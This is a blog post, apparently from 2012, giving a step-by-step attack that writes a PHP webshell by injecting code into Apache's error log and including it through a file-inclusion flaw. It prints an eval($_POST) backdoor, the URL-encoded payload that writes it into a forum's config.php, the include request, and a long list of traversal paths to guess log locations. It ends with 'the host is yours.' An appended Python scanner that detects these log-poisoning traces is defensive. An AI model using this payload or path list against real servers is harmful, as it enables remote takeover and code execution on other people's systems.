
PHP: writing a webshell by including the Apache log

Posted on 2012-9-15 14:27:40
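Because the approach above is not very practical: in my tests I found that the logs are often tens of megabytes, and at that size it is no fun to play with. Thinking a little further, we can write a genuinely practical webshell to use, which is also much better than the painfully slow approach above.

For example, take the same one-line trojan:
<?eval($_POST[cmd]);?>

At this point you may have realised that this is a very good approach. Read on: how to write it becomes the question. Use this:
fopen opens the file /home/virtual/www.xxx.com/forum/config.php and then writes the one-line trojan server-side statement <?eval($_POST[cmd]);?> into it. Put together as a PHP statement, that is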

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //write a one-line trojan statement into config.php

We submit this statement and let Apache record it in the error log; including the log then writes the shell. Remember that it must be converted to URL format to succeed.
Converted, it becomes
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
We submit
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

This way the line of code that writes the webshell is recorded in the error log.
Then we include the log, submitting
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

This way the webshell is written successfully, and config.php now contains the one-line trojan statement.
OK.
http://www.xxx.com/forum/config.php has now become our webshell.
Connect directly with lanker's client and the host is yours.

PS: the precondition for the above is that the folder permissions must be writable; it has to be -rwxrwxrwx (777) before you can continue. Here, check directly using the directory listed above. Everything described above is exploitation where the log path is already known.

For other log paths, you can guess, or refer to the list here.
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log
/var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log
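
Added example, not part of the original post: a defender-side check in Python for the two traces the technique above leaves in Apache logs, namely a PHP open tag arriving in a request (raw, percent-encoded or double-encoded) and a query parameter whose value points at a web server log file. The sample log lines, the addresses, the indicator names and the harmless echo(1) tag are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')   # request field of an access-log line
PHP_TAG_RE = re.compile(r'<\?(?!xml)', re.I)             # PHP open tag, ignoring <?xml
LOG_FILE_RE = re.compile(r'(?:^|/)[\w.-]*(?:acces{1,2}|error)[._]log$', re.I)

# Constructed sample lines (documentation addresses, harmless echo(1) tag).
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Sep/2012:14:20:01 +0800] "GET /%3C%3Fecho%281%29%3B%3F%3E HTTP/1.1" 404 209',
    '[Sat Sep 15 14:20:01 2012] [error] [client 203.0.113.7] File does not exist: /var/www/html/<?echo(1);?>',
    '203.0.113.7 - - [15/Sep/2012:14:21:10 +0800] "GET /z.php?zizzy=../../logs/www-error_log HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Sep/2012:14:22:30 +0800] "GET /%253C%253Fecho%25281%2529%253B%253F%253E HTTP/1.1" 404 209',
    '198.51.100.4 - - [15/Sep/2012:14:23:00 +0800] "GET /forum/index.php?page=2 HTTP/1.1" 200 1834',
]

def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also normalised."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text

def findings(line):
    """Return the set of indicators present in one access-log or error-log line."""
    found = set()
    # Indicator 1: PHP source stored in the log, which executes if the log is ever included.
    if PHP_TAG_RE.search(decode_fully(line)):
        found.add("php-open-tag-in-log")
    # Indicator 2: a request parameter whose value names a log file (include target).
    match = REQUEST_RE.search(line)
    if match:
        query = match.group(1).partition("?")[2]
        for name, value in parse_qsl(query, keep_blank_values=True):
            if LOG_FILE_RE.search(decode_fully(value)):
                found.add("log-path-in-parameter:" + name)
    return found

def scan(lines):
    """Return (line number, sorted indicators) for every line with a finding."""
    hits = ((number, findings(line)) for number, line in enumerate(lines, 1))
    return [(number, sorted(found)) for number, found in hits if found]

if __name__ == "__main__":
    for number, found in scan(SAMPLE_LOG):
        print(number, ", ".join(found))
```

A hit on either indicator is a reason to review the named script's include() call and to confirm that the web server account cannot read its own log files.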